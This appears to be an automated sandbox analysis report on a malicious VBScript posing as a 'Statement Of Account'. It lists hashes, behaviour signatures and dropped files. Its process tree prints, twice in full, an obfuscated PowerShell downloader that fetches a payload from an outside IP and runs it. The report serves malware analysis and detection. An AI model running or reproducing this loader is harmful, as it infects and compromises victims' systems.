Analysis
-
max time kernel
141s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 09:57
Static task
static1
Behavioral task
behavioral1
Sample
Statement Of Account (2).vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Statement Of Account (2).vbs
Resource
win10v2004-20240226-en
General
-
Target
Statement Of Account (2).vbs
-
Size
23KB
-
MD5
079ba09e4145b868609a94f1a69915e1
-
SHA1
9db5bac8bede1ef4a83ee41b3a503bca76696bdc
-
SHA256
daee067e46a83ec3c0e4f77bf53e126f076847b781bda39e3d13f0f6044be2f4
-
SHA512
9f9e484ba9232c201157c2b8a122da4a8686d807bfa22d05185df16dac4238aa9bc1923334e4249b7925b44f0515f30a60a894859a577f27d85ff7e9d66bed16
-
SSDEEP
384:ZoEnW+HRMkKZgrWfVndBc+/oQwZ/No1/Ip1fHr6dey0OOnzEJ0:vH2WahdBc6MSQ76wnzEJ0
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 2 3232 WScript.exe 7 1980 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1980 powershell.exe 1980 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3232 wrote to memory of 1980 3232 WScript.exe powershell.exe PID 3232 wrote to memory of 1980 3232 WScript.exe powershell.exe PID 1980 wrote to memory of 1436 1980 powershell.exe cmd.exe PID 1980 wrote to memory of 1436 1980 powershell.exe cmd.exe PID 1980 wrote to memory of 1368 1980 powershell.exe powershell.exe PID 1980 wrote to memory of 1368 1980 powershell.exe powershell.exe PID 1980 wrote to memory of 1368 1980 powershell.exe powershell.exe PID 1368 wrote to memory of 2196 1368 powershell.exe cmd.exe PID 1368 wrote to memory of 2196 1368 powershell.exe cmd.exe PID 1368 wrote to memory of 2196 1368 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statement Of Account (2).vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed';If (${host}.CurrentCulture) {$Globalisere++;}Function Ligningsanvisningerne($Afskaffelsen){$Ufuldbaarnes=$Afskaffelsen.Length-$Globalisere;$Udefinerlig='SUBsTRI';$Udefinerlig+='ng';For( $Artikuler42=7;$Artikuler42 -lt $Ufuldbaarnes;$Artikuler42+=8){$Tossestregers+=$Afskaffelsen.$Udefinerlig.Invoke( $Artikuler42, $Globalisere);}$Tossestregers;}function Brugsprogrammet($Ginies){ . ($Hackmack190) ($Ginies);}$Parergon=Ligningsanvisningerne 'A.vekslMBegettio dysswizRodentbiBrnerigl Ferie.lUdstatiaAgentur/ ,ataga5Kal.rif.Intersp0.rmekor Befjels(V.ntrilWSubsistiGeodesinchristid.adonnao mphasiwHalvabesNemmere MaalstnN GuldkoTFremmed Offend1Manleyf0 Heirlo.Stylost0H rsewo;reflekt Tum.dneWBa.dlngiBucklernAgatena6 Corona4Blinded;A.ikome Redbuckx midika6Defaiti4 Hologr;.gninge lynlaasrCiga,mav ,edhjl:nitter.1Bes.yre2Udsaves1Skalapa.Forblff0aggeros)Em.arra BetalbaGObsequieproslavcWor mankVandtiloSos,uil/Garruli2 Micros0H.meomo1Nomisti0Fraynsk0 Bakkus1Beedige0P.pperw1 lectua CoatninFStadseriDobbeltrsekarsieUnderkjfentocaro SpectaxOutwast/Hkkelbs1C,mposi2Hje,net1Opflask.Michela0Perdifo ';$Forfalden=Ligningsanvisningerne 'Ooma.tiUKunstnes T,ansce C.ossrrB.ndfil- SudansAPed palgFiskebae Fa,bornLoreas.tBroodie ';$Tyndtarmsbetndelser=Ligningsanvisningerne 'DobbelthH,teroptboya,dst EnkeltpPuzzle,:R infec/waterpi/Un.ccus1M,dimnu0Shaving3Sterla .St,pefi2Bowwort3For,lum7Persill.Fantasi8Saftnin6 Squelc.Ansvarl2 Bekrf 4Spncoun7Prereve/N,vellrG Jordske RoguinaImpugnenHjl ere. nconveaFrak iosDockworiTippeel ';$Melodramatics=Ligningsanvisningerne 'frate.n>Slut rk ';$Hackmack190=Ligningsanvisningerne 'Rad,obli AntitueMediocaxtaliaco ';$Forskaanes='Regnslagets';$Salutiferously = Ligningsanvisningerne 'rigsadveSkrdderc Splendh analisoRidde l Microco%Grnseega Squ shpP.oresyp H mitrdAppellea mmortatRdnbeneaPerceva% He.ebl\plapredLSydamernT,ekvarpIndiskmaParaguauMo embrsNewcomeeBe,egnirHe,lsbu. AntiopW OviparhPradogeiNonchas Algolag&Aktiver&Impress RadikalekortarmcSkeletshSquilgeoShirtfr svaleretAfsta d ';Brugsprogrammet (Ligningsanvisningerne ' icropt$Brus,regVivi.arlDrejeknoSypigerbFlej.skaUdskrerlMishand: PrakriCDkningsaMiasmoun Unvarin Kagchoi.xpositnShikseaeImbroc,s,agedejs Editi,eSnigmo,s ,aicha= Stikpr(Naa igsc .oshhjm FlettedW.atnot Paatale/knoensncm.sbapt Tidssk$FortidsSkildekraTacit,flInstin,uDipter.tOpga etiFinansmfRipostoeTj slagrconsecro LabiovuEthn,rcsOmsiderlViljekryUndersk)Biennio ');Brugsprogrammet (Ligningsanvisningerne 'dombogp$IrenicagKonfektlMarmarooAttes,mb ,ftalmaemanciplVid.res:EgnsudvDGlutinajfibrillaUnt,nineNedjustv OthililElementeCostumekoutglowu,ubricelIntrod t TrstubeGul rdrr Flag.lnMotatoreAlectry=Rumbely$cerat,pTTua,egeyti,rervn Dualisd CarbogtCates.raKnackinr recensmFolkesaslevnedsbPeerlese EventytForsvarnLaserstdMoggan,e FragtslTranscesdagvrkeeSelvg dr emetsv.Part ersRentenep Fo,kevlMeningsiSilverit Slayye(Antholo$PolygonMBullioneEstral.lSligh.ioDiscretd TrevnerTr,nhimaTim,savmAstmatiaWildasvtAnakolui Sat rscRastepls.teamer)Hermann ');Brugsprogrammet (Ligningsanvisningerne 'Frontis[ DepainNTranspleMiscountstemmej.Apati eSU,eneureTrossa r RosebuvSpeleani GenealcOutsmoke ProcrePInd treoAfholdsiHydrophnLindormt wha erMOplysn.aKrse.svnmissileaB,nnockg roatere Pent,trUnmod,r] pildev:Henho.d: TajgasSAfrig,eeBrdrefocFluoratuTolpklarUnsche.i S stemtSa menkymilieumPCounterrDrabbinoKapse at AdjectoStedsbecFl,treeoTroppetlDetache Bi.gins=Overcon Ca,amif[ BonamaNMucusinemastigatOpiumva. f,etkoS BetnkseBesanthcParato.uElenaparhavbioli ancerctCsectpayXylofonPcorymberapartheoAcheeratAfbetalolepidodcU mrkefoSchuftelBarric.TGelatinyTaareflp Klokkee,unjakk]Fagotti:Archway:repan.lTGo gerellaxativsAchrom.1Mekanis2Modera. ');$Tyndtarmsbetndelser=$Djaevlekulterne[0];$Oprrsaander= (Ligningsanvisningerne 'Fjor.ar$Komm.ntgRekursil Sulky,o Engangbtegnebra Inertil velv.l:telegralBrofagesForsmmenOro.anciLepi.odnFiv,bargRivebr sIngmundhLigningfVacatiot SvadaeeLands,orDeinothn S.arlae granul=Non,goiN Capybae Vertikw Endoce-El,mentONoncoopbChokolaj H.vedmeGradsfocVasodeptHimmeri KaproniSCasebeayRapportsO,positt StudieeTppemndm F,itte.PonenssNUnha.dieMalleabtCe,aove.AvisposWstringmePirre,ibGeyser,CFirdobllB stniniPa,suseeruskinin Fa.alit');$Oprrsaander+=$Canninesses[1];Brugsprogrammet ($Oprrsaander);Brugsprogrammet (Ligningsanvisningerne 'Outbo,s$ ShariflKommodesMesothen Venneni Domf.dn G,rrulgPacificsFlyk.prhInfinitfWhalenstLaughineTitulaer.remorsnGea dugeTele,et. .opulaHHo.edpuedis.ribaFljsb sdStykke.eFormkagr NoncomsTienden[ Prdika$Strid.nFKalkul o M adowrManagerfAntik,iaAandssllBesput d RetouceHelt,san Indeks].kkerfo=Spytkrl$.ichytaPReakt oaEnekammrTil,risePermatrrKnockougPreludioCumulatn Gridde ');$riving=Ligningsanvisningerne 'Grmmetb$reptilelFaregrusAgitatonInformaiKontinenSmrreb g Ch,dres Eyes,ahRenseanfAristoktGlatte,e EradiarDi kespnRhemi.te Udbred.SaltosbDMak oenoBybudinwforelsnntenalgilHekto roForenkla DisherdSugefddF Sytj.riforhrdelhjrecenebenchma( discom$PlunkedTSnildenyTrhvepsnBlindgndAquat,ntArbejd a SlutdarClinsubm FilmatsVimfulbb.nfeloneAdmoni,tUnderbyn .angskd Juici.eTurnin lDamploksAlbiziaeSeptemfrUdd,tas, Secrep$MenneskLBefolknoWorkhourMalaxateFoldecynLevant.t.agniosz rojekt)Antifla ';$Lorentz=$Canninesses[0];Brugsprogrammet (Ligningsanvisningerne 'Oligorh$ KernergP llesclFodgngeo U.revebHexosepa Aarr klB,rggyl:InverneSGastropo,travaikAftenstkUnavowaeRecompahProagulo Fd ralls,vlungdYabatrleunr.lyer StormfnRumdeleeekstrav=Dellsni( AnnuleT Weeze.e Ku.ingsHjernert Pleura-DiatomiPGymkhanaA,iogentLandvsehAf,bnin Produkt$PreinstL.lderamo mikr crParafraeR defogn ReservtEr vervz minde.)maskinf ');while (!$Sokkeholderne) {Brugsprogrammet (Ligningsanvisningerne 'Rulam.e$B.tulisgTopcheflBevge.soBrugervbUnmode aGrfteholMarleaa:UnrejoiL sig,rea.neredev nudelevLitherlaInd spon Ac omydstaaltreAssaulttfortykk=Coun,ed$Krypt,gtLderingr xtrafuUdringneKode.ek ') ;Brugsprogrammet $riving;Brugsprogrammet (Ligningsanvisningerne 'Ber.dskS BrleabtThiswisaLejrskorRlighedtTagdkke-Atto.nuSAfkalknl CorporeDdfdseleModalitpPyrote, Fjer,st4Tydeu,d ');Brugsprogrammet (Ligningsanvisningerne 'Antisoc$ Bettorg Aktionl F,lizioEfter lbIndervraEsoc,folnotarie:KuglereSUnreguloUnnaturkVikarikkBagladeeUnac.omh Sprge.o Unreprl NeliebdFalsetseSulphisrSpandganM ggotyeReident=Otteogt(TabitasTLkkestneFototeksUndiffetFarvelg-interpePRelatioaSemiliqtBortfo,hBendsfo Indrids$Om.elenL DemystoDaabsvirC rambye MaximinBogfr.etAflysesz Inq,is)Origina ') ;Brugsprogrammet (Ligningsanvisningerne 'Videoku$MdedeltgThetarylRevitaloChalottbUndern,aHunchbal s,anda: GrnsevPOuttwinrbloddraoUdtryksjCheapsceZ oparakHarassitOmph loeLag,rtir Pro.ru=Spinula$RomanisgFranceslFolkehroMovi.labskydninaDroeftelSuggest:BelysniMTaxeme.cRetroacd Precelo Ko ceruKundsk.gCaravanaSteelwolSkolem,lapparat+Rerenta+Victori% Uncomb$ BevareDBefugtnjLumbianaA ommage SuburbvPtotic,lNonmovee Mind,tk BuldreuSupercolGeolatrtR,keudveIn.olverTicklebnVirgolyeSeeming. SgeprocUngrippoUncry tuSlenbugnTnkeligtBriste. ') ;$Tyndtarmsbetndelser=$Djaevlekulterne[$Projekter];}$Vidervrdige=348811;$Snigmyrdedes=30612;Brugsprogrammet (Ligningsanvisningerne 'genneml$BddelksgDemerbilAal.orgoBla.folb blodsta .bpspol Herree:O.hidseRCrispieeSel.rnelOutwasteMimeoouvFaderskeRetfrdinge,icultIsoterm pel rin=Kedelsm AfmeldGOrnameneAlkalo.t Indbin-Soa.eduCPeripneo Oxidizn TankmatFina,smeSpaltennKumenintForpagt tekstbe$ R.cenrLCenturioPentecorPanamaiePokaltunSe,refitSupe,stz Emball ');Brugsprogrammet (Ligningsanvisningerne 'Trkgrun$Angka.yg Bra.hylSangtekoOverbevbSejtrknaD.arekilHvidm l:Delab aVforhaaba RaceadnsoberindstedsanrAnsttel S,mmerf=Bil ion Forgrim[PseudofSKae.ermypilinspsUnmediat Seniore Leci imStunt,e.RenslysCCacodonoForsor.nOtteogtvsensomreKallacirFors dot Predis]Uoplagt:Gnattie: .respeF ,ukkedrTo.elejoDagpengmVociferBP,overbaSinewras FruktoePh,toce6 rabidi4 SecretSVennekrtgal.erirSigtendiPhyl opnInpour gO,eocys(Ammerne$Aco.misRHandlekeFen,eril So bereManasquvRetireeeBoutelon Deas.itPaamind)Telegra ');Brugsprogrammet (Ligningsanvisningerne ' Oatydy$Trije.sg ModerllheemraaoUnripedb DiminuaDepositlslotted:Serviett Polysua BrochamCointere CaractiFedterinWagweno Dag,sta=Sacromo Temulen[RavenouSDi,fusiygenic,ts Ko muntHelc,ideChefposmsp.ctro.UvenskaTPi sedaekongsgaxTartarit Plough.Bossa.oEDom.fldnconsolec Fungico NaturldPjaskeni Libe tnO.erthrgUnsacri]Gly ure:Uncu,be:BanderiANonecceSStrygerC IchthyISystemeIDraftin.NonfragGIllessrePent.grtInter.eSPipinghtDigitalrmalefici,altedenJuggledgTypehol(,opulis$ObservaVOmkvdena raa,linFoste,idVenomi.rIndbygg)Coccusa ');Brugsprogrammet (Ligningsanvisningerne 'Nonspor$KalvestgKolonielOverflyo flsserb ,homboaRostrallfragt k:ElectromReallowl azionakwiltslaeDirplusk Vit igoFrilgnin EftertsTress,eePerik nrKlevognvHandelseUgenkensStrammef.arnsseaFjeder b rskninrLagerlii.megabsk Fe.tilkErost,aeTaurocorAret abnPoetryleKnoglem=Toluidi$Afstaaetdisambia UninvemFodbolde FyrassiAdelsslnNonfact.RboensbsMes,speuSu,trudb PopulasBagtipptFolketirJernrrfi Rebusin afple,gVildska(Bonbonn$TregrenVSocio,eiAnarchad Trav,leRdderl.r Propfuv exapodrVandrefdO,erstriHem.secgTheraphePont,ne, underl$ AziethSVoic,prnOpmarchiTrdiagrgDiapalmm faglityStedsndr Svirved Ted.ume ResortdFolkmoteSlambehsNoakine)Ampulet ');Brugsprogrammet $mlkekonservesfabrikkerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lnpauser.Whi && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed Tossestregers Mcdougall Projekter Djaevlekulterne Tyndtarmsbetndelser Ayoe udstykningerne Regnslagets Relevent Herskabshuse Nast179 tamein Thermolyze Heterology Turneers Nordist Lightninglike38 sveskesten Topydelsernes Firedobbelte20 Havfiskeriforeningers Lorentz Festprogrammer223 Elektronikvirksomhed';If (${host}.CurrentCulture) {$Globalisere++;}Function Ligningsanvisningerne($Afskaffelsen){$Ufuldbaarnes=$Afskaffelsen.Length-$Globalisere;$Udefinerlig='SUBsTRI';$Udefinerlig+='ng';For( $Artikuler42=7;$Artikuler42 -lt $Ufuldbaarnes;$Artikuler42+=8){$Tossestregers+=$Afskaffelsen.$Udefinerlig.Invoke( $Artikuler42, $Globalisere);}$Tossestregers;}function Brugsprogrammet($Ginies){ . ($Hackmack190) ($Ginies);}$Parergon=Ligningsanvisningerne 'A.vekslMBegettio dysswizRodentbiBrnerigl Ferie.lUdstatiaAgentur/ ,ataga5Kal.rif.Intersp0.rmekor Befjels(V.ntrilWSubsistiGeodesinchristid.adonnao mphasiwHalvabesNemmere MaalstnN GuldkoTFremmed Offend1Manleyf0 Heirlo.Stylost0H rsewo;reflekt Tum.dneWBa.dlngiBucklernAgatena6 Corona4Blinded;A.ikome Redbuckx midika6Defaiti4 Hologr;.gninge lynlaasrCiga,mav ,edhjl:nitter.1Bes.yre2Udsaves1Skalapa.Forblff0aggeros)Em.arra BetalbaGObsequieproslavcWor mankVandtiloSos,uil/Garruli2 Micros0H.meomo1Nomisti0Fraynsk0 Bakkus1Beedige0P.pperw1 lectua CoatninFStadseriDobbeltrsekarsieUnderkjfentocaro SpectaxOutwast/Hkkelbs1C,mposi2Hje,net1Opflask.Michela0Perdifo ';$Forfalden=Ligningsanvisningerne 'Ooma.tiUKunstnes T,ansce C.ossrrB.ndfil- SudansAPed palgFiskebae Fa,bornLoreas.tBroodie ';$Tyndtarmsbetndelser=Ligningsanvisningerne 'DobbelthH,teroptboya,dst EnkeltpPuzzle,:R infec/waterpi/Un.ccus1M,dimnu0Shaving3Sterla .St,pefi2Bowwort3For,lum7Persill.Fantasi8Saftnin6 Squelc.Ansvarl2 Bekrf 4Spncoun7Prereve/N,vellrG Jordske RoguinaImpugnenHjl ere. nconveaFrak iosDockworiTippeel ';$Melodramatics=Ligningsanvisningerne 'frate.n>Slut rk ';$Hackmack190=Ligningsanvisningerne 'Rad,obli AntitueMediocaxtaliaco ';$Forskaanes='Regnslagets';$Salutiferously = Ligningsanvisningerne 'rigsadveSkrdderc Splendh analisoRidde l Microco%Grnseega Squ shpP.oresyp H mitrdAppellea mmortatRdnbeneaPerceva% He.ebl\plapredLSydamernT,ekvarpIndiskmaParaguauMo embrsNewcomeeBe,egnirHe,lsbu. AntiopW OviparhPradogeiNonchas Algolag&Aktiver&Impress RadikalekortarmcSkeletshSquilgeoShirtfr svaleretAfsta d ';Brugsprogrammet (Ligningsanvisningerne ' icropt$Brus,regVivi.arlDrejeknoSypigerbFlej.skaUdskrerlMishand: PrakriCDkningsaMiasmoun Unvarin Kagchoi.xpositnShikseaeImbroc,s,agedejs Editi,eSnigmo,s ,aicha= Stikpr(Naa igsc .oshhjm FlettedW.atnot Paatale/knoensncm.sbapt Tidssk$FortidsSkildekraTacit,flInstin,uDipter.tOpga etiFinansmfRipostoeTj slagrconsecro LabiovuEthn,rcsOmsiderlViljekryUndersk)Biennio ');Brugsprogrammet (Ligningsanvisningerne 'dombogp$IrenicagKonfektlMarmarooAttes,mb ,ftalmaemanciplVid.res:EgnsudvDGlutinajfibrillaUnt,nineNedjustv OthililElementeCostumekoutglowu,ubricelIntrod t TrstubeGul rdrr Flag.lnMotatoreAlectry=Rumbely$cerat,pTTua,egeyti,rervn Dualisd CarbogtCates.raKnackinr recensmFolkesaslevnedsbPeerlese EventytForsvarnLaserstdMoggan,e FragtslTranscesdagvrkeeSelvg dr emetsv.Part ersRentenep Fo,kevlMeningsiSilverit Slayye(Antholo$PolygonMBullioneEstral.lSligh.ioDiscretd TrevnerTr,nhimaTim,savmAstmatiaWildasvtAnakolui Sat rscRastepls.teamer)Hermann ');Brugsprogrammet (Ligningsanvisningerne 'Frontis[ DepainNTranspleMiscountstemmej.Apati eSU,eneureTrossa r RosebuvSpeleani GenealcOutsmoke ProcrePInd treoAfholdsiHydrophnLindormt wha erMOplysn.aKrse.svnmissileaB,nnockg roatere Pent,trUnmod,r] pildev:Henho.d: TajgasSAfrig,eeBrdrefocFluoratuTolpklarUnsche.i S stemtSa menkymilieumPCounterrDrabbinoKapse at AdjectoStedsbecFl,treeoTroppetlDetache Bi.gins=Overcon Ca,amif[ BonamaNMucusinemastigatOpiumva. f,etkoS BetnkseBesanthcParato.uElenaparhavbioli ancerctCsectpayXylofonPcorymberapartheoAcheeratAfbetalolepidodcU mrkefoSchuftelBarric.TGelatinyTaareflp Klokkee,unjakk]Fagotti:Archway:repan.lTGo gerellaxativsAchrom.1Mekanis2Modera. ');$Tyndtarmsbetndelser=$Djaevlekulterne[0];$Oprrsaander= (Ligningsanvisningerne 'Fjor.ar$Komm.ntgRekursil Sulky,o Engangbtegnebra Inertil velv.l:telegralBrofagesForsmmenOro.anciLepi.odnFiv,bargRivebr sIngmundhLigningfVacatiot SvadaeeLands,orDeinothn S.arlae granul=Non,goiN Capybae Vertikw Endoce-El,mentONoncoopbChokolaj H.vedmeGradsfocVasodeptHimmeri KaproniSCasebeayRapportsO,positt StudieeTppemndm F,itte.PonenssNUnha.dieMalleabtCe,aove.AvisposWstringmePirre,ibGeyser,CFirdobllB stniniPa,suseeruskinin Fa.alit');$Oprrsaander+=$Canninesses[1];Brugsprogrammet ($Oprrsaander);Brugsprogrammet (Ligningsanvisningerne 'Outbo,s$ ShariflKommodesMesothen Venneni Domf.dn G,rrulgPacificsFlyk.prhInfinitfWhalenstLaughineTitulaer.remorsnGea dugeTele,et. .opulaHHo.edpuedis.ribaFljsb sdStykke.eFormkagr NoncomsTienden[ Prdika$Strid.nFKalkul o M adowrManagerfAntik,iaAandssllBesput d RetouceHelt,san Indeks].kkerfo=Spytkrl$.ichytaPReakt oaEnekammrTil,risePermatrrKnockougPreludioCumulatn Gridde ');$riving=Ligningsanvisningerne 'Grmmetb$reptilelFaregrusAgitatonInformaiKontinenSmrreb g Ch,dres Eyes,ahRenseanfAristoktGlatte,e EradiarDi kespnRhemi.te Udbred.SaltosbDMak oenoBybudinwforelsnntenalgilHekto roForenkla DisherdSugefddF Sytj.riforhrdelhjrecenebenchma( discom$PlunkedTSnildenyTrhvepsnBlindgndAquat,ntArbejd a SlutdarClinsubm FilmatsVimfulbb.nfeloneAdmoni,tUnderbyn .angskd Juici.eTurnin lDamploksAlbiziaeSeptemfrUdd,tas, Secrep$MenneskLBefolknoWorkhourMalaxateFoldecynLevant.t.agniosz rojekt)Antifla ';$Lorentz=$Canninesses[0];Brugsprogrammet (Ligningsanvisningerne 'Oligorh$ KernergP llesclFodgngeo U.revebHexosepa Aarr klB,rggyl:InverneSGastropo,travaikAftenstkUnavowaeRecompahProagulo Fd ralls,vlungdYabatrleunr.lyer StormfnRumdeleeekstrav=Dellsni( AnnuleT Weeze.e Ku.ingsHjernert Pleura-DiatomiPGymkhanaA,iogentLandvsehAf,bnin Produkt$PreinstL.lderamo mikr crParafraeR defogn ReservtEr vervz minde.)maskinf ');while (!$Sokkeholderne) {Brugsprogrammet (Ligningsanvisningerne 'Rulam.e$B.tulisgTopcheflBevge.soBrugervbUnmode aGrfteholMarleaa:UnrejoiL sig,rea.neredev nudelevLitherlaInd spon Ac omydstaaltreAssaulttfortykk=Coun,ed$Krypt,gtLderingr xtrafuUdringneKode.ek ') ;Brugsprogrammet $riving;Brugsprogrammet (Ligningsanvisningerne 'Ber.dskS BrleabtThiswisaLejrskorRlighedtTagdkke-Atto.nuSAfkalknl CorporeDdfdseleModalitpPyrote, Fjer,st4Tydeu,d ');Brugsprogrammet (Ligningsanvisningerne 'Antisoc$ Bettorg Aktionl F,lizioEfter lbIndervraEsoc,folnotarie:KuglereSUnreguloUnnaturkVikarikkBagladeeUnac.omh Sprge.o Unreprl NeliebdFalsetseSulphisrSpandganM ggotyeReident=Otteogt(TabitasTLkkestneFototeksUndiffetFarvelg-interpePRelatioaSemiliqtBortfo,hBendsfo Indrids$Om.elenL DemystoDaabsvirC rambye MaximinBogfr.etAflysesz Inq,is)Origina ') ;Brugsprogrammet (Ligningsanvisningerne 'Videoku$MdedeltgThetarylRevitaloChalottbUndern,aHunchbal s,anda: GrnsevPOuttwinrbloddraoUdtryksjCheapsceZ oparakHarassitOmph loeLag,rtir Pro.ru=Spinula$RomanisgFranceslFolkehroMovi.labskydninaDroeftelSuggest:BelysniMTaxeme.cRetroacd Precelo Ko ceruKundsk.gCaravanaSteelwolSkolem,lapparat+Rerenta+Victori% Uncomb$ BevareDBefugtnjLumbianaA ommage SuburbvPtotic,lNonmovee Mind,tk BuldreuSupercolGeolatrtR,keudveIn.olverTicklebnVirgolyeSeeming. SgeprocUngrippoUncry tuSlenbugnTnkeligtBriste. ') ;$Tyndtarmsbetndelser=$Djaevlekulterne[$Projekter];}$Vidervrdige=348811;$Snigmyrdedes=30612;Brugsprogrammet (Ligningsanvisningerne 'genneml$BddelksgDemerbilAal.orgoBla.folb blodsta .bpspol Herree:O.hidseRCrispieeSel.rnelOutwasteMimeoouvFaderskeRetfrdinge,icultIsoterm pel rin=Kedelsm AfmeldGOrnameneAlkalo.t Indbin-Soa.eduCPeripneo Oxidizn TankmatFina,smeSpaltennKumenintForpagt tekstbe$ R.cenrLCenturioPentecorPanamaiePokaltunSe,refitSupe,stz Emball ');Brugsprogrammet (Ligningsanvisningerne 'Trkgrun$Angka.yg Bra.hylSangtekoOverbevbSejtrknaD.arekilHvidm l:Delab aVforhaaba RaceadnsoberindstedsanrAnsttel S,mmerf=Bil ion Forgrim[PseudofSKae.ermypilinspsUnmediat Seniore Leci imStunt,e.RenslysCCacodonoForsor.nOtteogtvsensomreKallacirFors dot Predis]Uoplagt:Gnattie: .respeF ,ukkedrTo.elejoDagpengmVociferBP,overbaSinewras FruktoePh,toce6 rabidi4 SecretSVennekrtgal.erirSigtendiPhyl opnInpour gO,eocys(Ammerne$Aco.misRHandlekeFen,eril So bereManasquvRetireeeBoutelon Deas.itPaamind)Telegra ');Brugsprogrammet (Ligningsanvisningerne ' Oatydy$Trije.sg ModerllheemraaoUnripedb DiminuaDepositlslotted:Serviett Polysua BrochamCointere CaractiFedterinWagweno Dag,sta=Sacromo Temulen[RavenouSDi,fusiygenic,ts Ko muntHelc,ideChefposmsp.ctro.UvenskaTPi sedaekongsgaxTartarit Plough.Bossa.oEDom.fldnconsolec Fungico NaturldPjaskeni Libe tnO.erthrgUnsacri]Gly ure:Uncu,be:BanderiANonecceSStrygerC IchthyISystemeIDraftin.NonfragGIllessrePent.grtInter.eSPipinghtDigitalrmalefici,altedenJuggledgTypehol(,opulis$ObservaVOmkvdena raa,linFoste,idVenomi.rIndbygg)Coccusa ');Brugsprogrammet (Ligningsanvisningerne 'Nonspor$KalvestgKolonielOverflyo flsserb ,homboaRostrallfragt k:ElectromReallowl azionakwiltslaeDirplusk Vit igoFrilgnin EftertsTress,eePerik nrKlevognvHandelseUgenkensStrammef.arnsseaFjeder b rskninrLagerlii.megabsk Fe.tilkErost,aeTaurocorAret abnPoetryleKnoglem=Toluidi$Afstaaetdisambia UninvemFodbolde FyrassiAdelsslnNonfact.RboensbsMes,speuSu,trudb PopulasBagtipptFolketirJernrrfi Rebusin afple,gVildska(Bonbonn$TregrenVSocio,eiAnarchad Trav,leRdderl.r Propfuv exapodrVandrefdO,erstriHem.secgTheraphePont,ne, underl$ AziethSVoic,prnOpmarchiTrdiagrgDiapalmm faglityStedsndr Svirved Ted.ume ResortdFolkmoteSlambehsNoakine)Ampulet ');Brugsprogrammet $mlkekonservesfabrikkerne;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lnpauser.Whi && echo t"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3804 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zfcct5r.jxe.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Lnpauser.WhiFilesize
494KB
MD5c28d6b2ceae5dffd7a142c049d5b4d30
SHA1345331b6ef241644eb175f84d395ed8eb9d5535e
SHA25659e6d1046b16283769943f531b27a79e946b47a1fa8e889f69ec165b92088385
SHA512ea75770ea523290f2fb4e7dd68e9b1f0f2a216e778467ebb5d2bb994237447550d16802c18722c80f0ca08bfe4510220d933afd1ab890af114c13aed2c7c1a37
-
memory/1368-41-0x0000000006950000-0x000000000696A000-memory.dmpFilesize
104KB
-
